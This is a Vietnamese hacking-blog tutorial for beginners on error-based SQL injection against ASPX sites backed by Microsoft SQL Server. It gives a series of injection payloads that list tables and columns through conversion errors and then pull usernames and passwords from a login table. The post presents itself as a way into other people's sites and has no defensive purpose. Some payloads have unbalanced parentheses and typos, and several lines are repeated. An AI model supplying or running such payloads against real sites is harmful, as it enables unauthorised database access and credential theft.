Joker Blog
Nguyễn Anh Pha
Bài 2: Training For Newbie các bước Check site lỗi ASPX đơn giản
-------------------------------------------------------------
Khai thác lỗi SQL ASPX:
-------------------------------------------------------------
Khai thác lỗi SQL ASPX:
+ Bước 1: AND 1=CONVERT(INT,(SELECT top 1 TABLE_NAME FROM information_schema.TABLES))-- -
+ Bước 2: AND 1=CONVERT(INT,(SELECT top 1 TABLE_NAME FROM information_schema.TABLES WHERE TABLE_NAME NOT IN ('tbl_DangNhap')-- -
Trong phần < NOT IN (.....)-- -> viết lệnh tiếp để ra các table, có nghĩa là khi bạn có được một "table" nào đó thì mình bỏ tiếp cái "table" đó vào để check cho nó xuất hiện "table" tiếp theo
- Các bạn lưu ý dùm mình là "tbl_DangNhap" là table mình chỉ lấy ví dụ thôi nhé ko phải site nào ASPX cũng là kiểu tbl_DangNhap đâu đấy, vì thế các bạn nên linh hoạt trong việc tìm kiếm Table và thực hành càng nhiều thì kinh nghiệm đoán Table càng cao, nên tích hợp những Table mà mình tìm được vào 1 Notepad để khi cần có cái mà dùng.
+ Bước 3: AND 1=CONVERT(INT,(SELECT top 1 column_name FROM information_schema.COLUMNS WHERE TABLE_NAME=('tbl_DangNhap') ))-- -
=>> được thông số 'ID' tiếp
AND 1=CONVERT(INT,(SELECT top 1 COLUMN name FROM information_schema.COLUMNS WHERE TABLE_NAME=('tbl_DangNhap') AND column_name NOT IN('ID') ))-- -
được thông số 'username' tiếp
AND 1=CONVERT(INT,(SELECT top 1 column_name FROM information_schema.COLUMNS WHERE TABLE_NAME=('tbl_DangNhap') AND column_name NOT IN ('ID'),'username') ))-- -
được thông số password
+ Bước 4: Khai thác thông tin username và password:
username:
AND 1=CONVERT(INT,(SELECT top 1 username FROM tbl_DangNhap))-- -
username:
AND 1=CONVERT(INT,(SELECT top 1 username FROM tbl_DangNhap))-- -
passord:
AND 1=CONVERT(INT,SELECT top 1 password FROM tbl_DangNhap))-- -
AND 1=CONVERT(INT,SELECT top 1 password FROM tbl_DangNhap))-- -
Quý Huỳnh, Admin VN-Hacking Group
Copy xin để lại nguồn
---------------------- The End Check Site SQL ASPX ----------------------
